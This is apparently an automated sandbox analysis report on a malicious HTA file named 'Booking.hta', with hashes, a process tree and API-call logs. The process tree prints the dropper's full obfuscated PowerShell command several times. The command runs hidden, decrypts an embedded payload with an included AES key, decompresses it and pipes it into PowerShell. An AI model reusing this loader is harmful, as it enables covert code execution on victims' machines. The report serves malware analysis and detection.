Summary | ZeroBOX

Booking.hta

Generic Malware Antivirus AntiDebug MSOffice File AntiVM PowerShell
Category Machine Started Completed
FILE s1_win7_x6401 Jan. 30, 2024, 4:19 p.m. Jan. 30, 2024, 4:22 p.m.
Size 1.1MB
Type HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5 fc44bc846156354fa99f4f483a360bd0
SHA256 c2665b9cdc176d4d0de22373e02d73ec253557673502585f1fe671a66f5c37b3
CRC32 C48A0708
ssdeep 1536:2CZDFg7jAq0wwx2AP5RsmAk7Y1XH0331TRvNJIm+lIWFh+77ixesBwvugxiefrDe:pDFAjAq/wx2A/sm/Y1303ly
Yara None matched

  • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\Booking.hta.html

    2612
    • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2612 CREDAT:145409

      2700
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $aLsftDKY = 'AAAAAAAAAAAAAAAAAAAAAO4m7YWwIHSB5hZ6WH96f5FuL5U5uPFq7F8RGzGOOjPAZSm80tg7wEfIXYu5+lz5PyJ50DD3hxut/1MS/sxU8ZFsWcl0JNohszi8GgF4AwgWiHMg9Z/ibGHWagLGXxVnyuifkF+t/GIGPNsyr3rBCR/3XKCA9Rg9h3WK3Vu65F6QlJSg+ClYEl6mqsq/bQ8CxLYxK+xGbuhbJdKTDOytmzLkaZhokqPJsb0k4JwWqdann7AudNujeQJnF9JDHa4/6CuiQxXz4SvTL0mC2y1o/5xINhK3yoo6rMfshcfXGYdt/nfHTivyuvmjhQbBdigORs7P0coe4LPTzar7K/BCtIqerfEHRhzXMIN69EMmif9lQabSbGGaLk0NYLWcLT8vVCQDjNDz1FtMvRpOq1tP9MRPfBWfLo3q/zpm4E6au3yQqtlsfut1HTOActYuAa6UWBjNiweyXj3LQKcCTqf08jdJay1uv7oE+iHkmE+HHDwggvTAr6HjX9vT34KcKqm8UaVvV6by+j/vLomjKmVjXBzCmChwebc8Ti0sD+dz/WCV48KophgbtVKxnYfMGyJzQNnN5IMAs7t+W+IzHJIDcNCcOL+D8vZis3fIT8O6tJ19uXYo0fPulv5MsTZxn2C8O3r0eCKq5GkLuQEEEcLxjJi3czl2hElXaTmkNEZXxTSb1RfcU/EZ/LZZJbhHvo6JLoFTeXy6GqpMmdYiWx5ZzkZZWxyCF0JaXNvTxLZ/QF/b2JK1J4e/NvSW6hiVBYoS9YfhEyqeyaw8twsK2Laj+PGjlSc7EUHYHJznQsn9lrfayYdKXbdaLKL2prn67k7wg1Ep3m+sK03XVkg8hbJrZveAlyfxL4Lq+7ne5hoL9m7Zayr9FVklJj7q4M8DBvTI2X3Ab9/3vM0hXM7Vmo+LP9py7CQx+kQ5tyPQDFc0JAsgFpUFgM0mnLl1+cFWQxaNUdtqiYi1YCsAjzgBuuuTnqd0OjnmyRDFKCpQYLZ14jjY1Tjhl6yWfIOuhw0kA9op5dUyQgLGY0kXmwkXmWaeO73vAMMSgU28ElxCh6MbbPDGNFRjoSOJ6HPqZIFBLKv9mw==';$rhrxHack = 'THVRU0tZSG9UZ0dOWEFTU25zdmtBRE5XelhWQWJ0R3Y=';$agjCKS = New-Object 'System.Security.Cryptography.AesManaged';$agjCKS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$agjCKS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$agjCKS.BlockSize = 128;$agjCKS.KeySize = 256;$agjCKS.Key = [System.Convert]::FromBase64String($rhrxHack);$OtXkk = [System.Convert]::FromBase64String($aLsftDKY);$zPgIkFFt = $OtXkk[0..15];$agjCKS.IV = $zPgIkFFt;$AJxGfSbWQ = $agjCKS.CreateDecryptor();$PAcQmaiYr = $AJxGfSbWQ.TransformFinalBlock($OtXkk, 16, $OtXkk.Length - 16);$agjCKS.Dispose();$cykSE = New-Object System.IO.MemoryStream( , $PAcQmaiYr );$TygiA = New-Object System.IO.MemoryStream;$HynMnhZHL = New-Object System.IO.Compression.GzipStream $cykSE, ([IO.Compression.CompressionMode]::Decompress);$HynMnhZHL.CopyTo( $TygiA );$HynMnhZHL.Close();$cykSE.Close();[byte[]] $BvKJEQU = $TygiA.ToArray();$CiCNoyk = [System.Text.Encoding]::UTF8.GetString($BvKJEQU);$CiCNoyk | powershell - }

        2928
        • cmd.exe "C:\Windows\system32\cmd.exe" /c powershell.exe $aLsftDKY = 'AAAAAAAAAAAAAAAAAAAAAO4m7YWwIHSB5hZ6WH96f5FuL5U5uPFq7F8RGzGOOjPAZSm80tg7wEfIXYu5+lz5PyJ50DD3hxut/1MS/sxU8ZFsWcl0JNohszi8GgF4AwgWiHMg9Z/ibGHWagLGXxVnyuifkF+t/GIGPNsyr3rBCR/3XKCA9Rg9h3WK3Vu65F6QlJSg+ClYEl6mqsq/bQ8CxLYxK+xGbuhbJdKTDOytmzLkaZhokqPJsb0k4JwWqdann7AudNujeQJnF9JDHa4/6CuiQxXz4SvTL0mC2y1o/5xINhK3yoo6rMfshcfXGYdt/nfHTivyuvmjhQbBdigORs7P0coe4LPTzar7K/BCtIqerfEHRhzXMIN69EMmif9lQabSbGGaLk0NYLWcLT8vVCQDjNDz1FtMvRpOq1tP9MRPfBWfLo3q/zpm4E6au3yQqtlsfut1HTOActYuAa6UWBjNiweyXj3LQKcCTqf08jdJay1uv7oE+iHkmE+HHDwggvTAr6HjX9vT34KcKqm8UaVvV6by+j/vLomjKmVjXBzCmChwebc8Ti0sD+dz/WCV48KophgbtVKxnYfMGyJzQNnN5IMAs7t+W+IzHJIDcNCcOL+D8vZis3fIT8O6tJ19uXYo0fPulv5MsTZxn2C8O3r0eCKq5GkLuQEEEcLxjJi3czl2hElXaTmkNEZXxTSb1RfcU/EZ/LZZJbhHvo6JLoFTeXy6GqpMmdYiWx5ZzkZZWxyCF0JaXNvTxLZ/QF/b2JK1J4e/NvSW6hiVBYoS9YfhEyqeyaw8twsK2Laj+PGjlSc7EUHYHJznQsn9lrfayYdKXbdaLKL2prn67k7wg1Ep3m+sK03XVkg8hbJrZveAlyfxL4Lq+7ne5hoL9m7Zayr9FVklJj7q4M8DBvTI2X3Ab9/3vM0hXM7Vmo+LP9py7CQx+kQ5tyPQDFc0JAsgFpUFgM0mnLl1+cFWQxaNUdtqiYi1YCsAjzgBuuuTnqd0OjnmyRDFKCpQYLZ14jjY1Tjhl6yWfIOuhw0kA9op5dUyQgLGY0kXmwkXmWaeO73vAMMSgU28ElxCh6MbbPDGNFRjoSOJ6HPqZIFBLKv9mw==';$rhrxHack = 'THVRU0tZSG9UZ0dOWEFTU25zdmtBRE5XelhWQWJ0R3Y=';$agjCKS = New-Object 'System.Security.Cryptography.AesManaged';$agjCKS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$agjCKS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$agjCKS.BlockSize = 128;$agjCKS.KeySize = 256;$agjCKS.Key = [System.Convert]::FromBase64String($rhrxHack);$OtXkk = [System.Convert]::FromBase64String($aLsftDKY);$zPgIkFFt = $OtXkk[0..15];$agjCKS.IV = $zPgIkFFt;$AJxGfSbWQ = $agjCKS.CreateDecryptor();$PAcQmaiYr = $AJxGfSbWQ.TransformFinalBlock($OtXkk, 16, $OtXkk.Length - 16);$agjCKS.Dispose();$cykSE = New-Object System.IO.MemoryStream( , $PAcQmaiYr );$TygiA = New-Object System.IO.MemoryStream;$HynMnhZHL = New-Object System.IO.Compression.GzipStream $cykSE, ([IO.Compression.CompressionMode]::Decompress);$HynMnhZHL.CopyTo( $TygiA );$HynMnhZHL.Close();$cykSE.Close();[byte[]] $BvKJEQU = $TygiA.ToArray();$CiCNoyk = [System.Text.Encoding]::UTF8.GetString($BvKJEQU);$CiCNoyk | powershell -

          2080
          • powershell.exe powershell.exe $aLsftDKY = 'AAAAAAAAAAAAAAAAAAAAAO4m7YWwIHSB5hZ6WH96f5FuL5U5uPFq7F8RGzGOOjPAZSm80tg7wEfIXYu5+lz5PyJ50DD3hxut/1MS/sxU8ZFsWcl0JNohszi8GgF4AwgWiHMg9Z/ibGHWagLGXxVnyuifkF+t/GIGPNsyr3rBCR/3XKCA9Rg9h3WK3Vu65F6QlJSg+ClYEl6mqsq/bQ8CxLYxK+xGbuhbJdKTDOytmzLkaZhokqPJsb0k4JwWqdann7AudNujeQJnF9JDHa4/6CuiQxXz4SvTL0mC2y1o/5xINhK3yoo6rMfshcfXGYdt/nfHTivyuvmjhQbBdigORs7P0coe4LPTzar7K/BCtIqerfEHRhzXMIN69EMmif9lQabSbGGaLk0NYLWcLT8vVCQDjNDz1FtMvRpOq1tP9MRPfBWfLo3q/zpm4E6au3yQqtlsfut1HTOActYuAa6UWBjNiweyXj3LQKcCTqf08jdJay1uv7oE+iHkmE+HHDwggvTAr6HjX9vT34KcKqm8UaVvV6by+j/vLomjKmVjXBzCmChwebc8Ti0sD+dz/WCV48KophgbtVKxnYfMGyJzQNnN5IMAs7t+W+IzHJIDcNCcOL+D8vZis3fIT8O6tJ19uXYo0fPulv5MsTZxn2C8O3r0eCKq5GkLuQEEEcLxjJi3czl2hElXaTmkNEZXxTSb1RfcU/EZ/LZZJbhHvo6JLoFTeXy6GqpMmdYiWx5ZzkZZWxyCF0JaXNvTxLZ/QF/b2JK1J4e/NvSW6hiVBYoS9YfhEyqeyaw8twsK2Laj+PGjlSc7EUHYHJznQsn9lrfayYdKXbdaLKL2prn67k7wg1Ep3m+sK03XVkg8hbJrZveAlyfxL4Lq+7ne5hoL9m7Zayr9FVklJj7q4M8DBvTI2X3Ab9/3vM0hXM7Vmo+LP9py7CQx+kQ5tyPQDFc0JAsgFpUFgM0mnLl1+cFWQxaNUdtqiYi1YCsAjzgBuuuTnqd0OjnmyRDFKCpQYLZ14jjY1Tjhl6yWfIOuhw0kA9op5dUyQgLGY0kXmwkXmWaeO73vAMMSgU28ElxCh6MbbPDGNFRjoSOJ6HPqZIFBLKv9mw==';$rhrxHack = 'THVRU0tZSG9UZ0dOWEFTU25zdmtBRE5XelhWQWJ0R3Y=';$agjCKS = New-Object 'System.Security.Cryptography.AesManaged';$agjCKS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$agjCKS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$agjCKS.BlockSize = 128;$agjCKS.KeySize = 256;$agjCKS.Key = [System.Convert]::FromBase64String($rhrxHack);$OtXkk = [System.Convert]::FromBase64String($aLsftDKY);$zPgIkFFt = $OtXkk[0..15];$agjCKS.IV = $zPgIkFFt;$AJxGfSbWQ = $agjCKS.CreateDecryptor();$PAcQmaiYr = $AJxGfSbWQ.TransformFinalBlock($OtXkk, 16, $OtXkk.Length - 16);$agjCKS.Dispose();$cykSE = New-Object System.IO.MemoryStream( , $PAcQmaiYr );$TygiA = New-Object System.IO.MemoryStream;$HynMnhZHL = New-Object System.IO.Compression.GzipStream $cykSE, ([IO.Compression.CompressionMode]::Decompress);$HynMnhZHL.CopyTo( $TygiA );$HynMnhZHL.Close();$cykSE.Close();[byte[]] $BvKJEQU = $TygiA.ToArray();$CiCNoyk = [System.Text.Encoding]::UTF8.GetString($BvKJEQU);$CiCNoyk

            196

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
117.18.232.200 Active Moloch
164.124.101.2 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Invalid assignment expression. The left hand side of an assignment operator nee
console_handle: 0x00000000000003c7
1 1 0

WriteConsoleW

buffer: ds to be something that can be assigned to like a variable or a property.
console_handle: 0x00000000000003d3
1 1 0

WriteConsoleW

buffer: At line:36 char:14
console_handle: 0x00000000000003df
1 1 0

WriteConsoleW

buffer: + + $aLsftDKY = <<<< 'AAAAAAAAAAAAAAAAAAAAAO4m7YWwIHSB5hZ6WH96f5FuL5U5uPFq7F8R
console_handle: 0x00000000000003eb
1 1 0

WriteConsoleW

buffer: GzGOOjPA
console_handle: 0x00000000000003f7
1 1 0

WriteConsoleW

buffer: + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordEx
console_handle: 0x0000000000000403
1 1 0

WriteConsoleW

buffer: ception
console_handle: 0x000000000000040f
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : InvalidLeftHandSide
console_handle: 0x000000000000041b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002e7ab0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a3100
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a3100
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a3100
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a35d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a35d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a3100
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a3100
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a3100
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a3100
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a3b10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a3b10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a3b10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a3800
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a3800
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a3800
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a3fe0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a3fe0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a3fe0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a3fe0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a3fe0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a3fe0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a3fe0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a3fe0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a4050
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a4050
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a4050
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a4050
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a4050
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a3800
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a3800
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a4050
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a4050
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a4050
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6cf650
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6cf650
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6cf6c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6cf6c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6d0300
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6d0300
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000291890
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b798bc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b798bc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b798bc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b798760
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b798760
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b798bc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b798bc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b798bc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b798bc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefd4fa49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefdba73c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefd9243bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdbc5295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdbc2799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdc6af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdc6b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdbc48d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefda50883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefda50ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefda50c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefd90a4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefd91d551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefda5347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefda5122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefda53542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefd91d42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefd91d1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x769c9bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x769c98da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefd91d0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefda43e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefd8f0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefd8f0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76c2652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x76d5c521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefd4fa49d
registers.r14: 0
registers.r15: 0
registers.rcx: 110814608
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 110820560
registers.r11: 110816368
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1887260577
registers.r13: 0
1 0 0
request GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2612
region_size: 6164480
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002e30000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2612
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000003410000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769cd000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769d4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefefc4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
